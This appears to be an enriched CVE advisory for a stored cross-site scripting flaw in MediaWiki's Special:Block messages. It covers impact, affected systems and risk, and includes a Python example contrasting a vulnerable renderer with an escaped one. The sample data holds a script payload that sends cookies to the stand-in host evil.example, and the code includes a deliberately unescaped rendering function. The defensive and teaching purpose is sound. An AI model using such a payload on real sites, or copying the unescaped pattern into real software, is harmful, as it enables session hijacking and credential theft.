Impact
This vulnerability is a stored cross-site scripting (XSS) flaw in MediaWiki, maintained by the Wikimedia Foundation: a message added or edited through Special:Block is not properly neutralized when it is rendered on a page. An attacker who can submit such a message can embed JavaScript that executes in the browser of every user who views the block page, which can hijack that user's session, steal credentials, or deface content. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and compromises the confidentiality and integrity of any affected user who views the page.
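The following is an added illustration of the CWE-79 pattern described above, not MediaWiki code and not a reproduction of the Special:Block template. It assumes a generic block notice that is built from stored records; the record layout, the function names (render_block_notice_vulnerable, render_block_notice_safe, suspicious_reasons, contains_live_script) and the sample block reasons, including the script payload, are all constructed for the example.

```python
"""Stored XSS: an unescaped block message vs. the same message escaped on output.

Generic illustration only; it is not MediaWiki code. The BLOCKS records and the
function names are constructed for this example.
"""
import html
import re

# Constructed sample of stored block records, as someone with block rights might
# have submitted them through a block form. Only the last one carries a script
# payload; the second one shows that harmless-looking markup is also stored as-is.
BLOCKS = [
    {"target": "Spammer1", "reason": "Spam: repeated link dumping"},
    {"target": "Vandal42", "reason": "Vandalism <b>again</b>"},
    {"target": "Sock7", "reason": 'Sock puppet <script>document.location="https://evil.example/?c="+document.cookie</script>'},
]


def render_block_notice_vulnerable(block):
    """The flawed pattern (CWE-79): stored text is concatenated into HTML as-is,
    so any markup inside the reason becomes part of the page's DOM."""
    return (
        "<div class='block-notice'>User "
        + block["target"]
        + " is blocked. Reason: "
        + block["reason"]
        + "</div>"
    )


def render_block_notice_safe(block):
    """Hardened form: every untrusted value is entity-encoded at the point it
    enters HTML text content, so the browser shows it as literal characters."""
    return (
        "<div class='block-notice'>User "
        + html.escape(block["target"], quote=True)
        + " is blocked. Reason: "
        + html.escape(block["reason"], quote=True)
        + "</div>"
    )


# Crude triage aid for stored reasons that already contain markup-like content.
# A '<', an '&#' entity prefix or a 'javascript:' scheme in a free-text reason is
# worth a look. This is a review helper, not a control: output escaping is the fix.
MARKUP_RE = re.compile(r"<|&#|javascript:", re.IGNORECASE)


def suspicious_reasons(blocks):
    """Return the targets whose stored reason contains markup-like content."""
    return [b["target"] for b in blocks if MARKUP_RE.search(b["reason"])]


def contains_live_script(rendered_html):
    """True if the rendered output still contains a raw <script ...> tag, i.e.
    the payload would execute when a browser parses the page."""
    return re.search(r"<script\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    for b in BLOCKS:
        print("vulnerable :", render_block_notice_vulnerable(b))
        print("safe       :", render_block_notice_safe(b))
    print("needs review:", suspicious_reasons(BLOCKS))
```

The vulnerable renderer emits the stored `<script>` tag verbatim, so it runs for anyone who loads the notice; the safe renderer turns it into `&lt;script&gt;`, which the browser displays as text. On a real wiki the same triage idea applies to block reasons already in the block log: reasons containing angle brackets or entity sequences deserve a look while the patch is being rolled out, but only the output escaping in the page-rendering code actually removes the vulnerability.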
Affected Systems
The affected product is MediaWiki from the Wikimedia Foundation. The CVE data does not specify affected versions, so any deployment whose Special:Block message handling predates the fix should be treated as exposed. Administrators should confirm, against the MediaWiki release notes and the upstream security advisory for this CVE, that their installed version includes the patch that neutralizes the message before it is rendered.
Risk and Exploitability
No CVSS score or EPSS score is published for this entry, so the risk cannot be quantified from the public data alone. Stored XSS flaws typically carry moderate to high severity, and here exploitability depends on who can reach the Special:Block interface and what permissions those users hold: the description implies that the malicious content is introduced by privileged users who can submit block messages, or by those able to edit the system messages the page displays, rather than by anonymous visitors. The payload then reaches every user who views the block page, including other administrators, which is what makes a flaw reachable only by privileged accounts still worth patching promptly. The vulnerability is not listed in CISA's KEV catalog, so there is no public evidence of active exploitation at this time.
OpenCVE Enrichment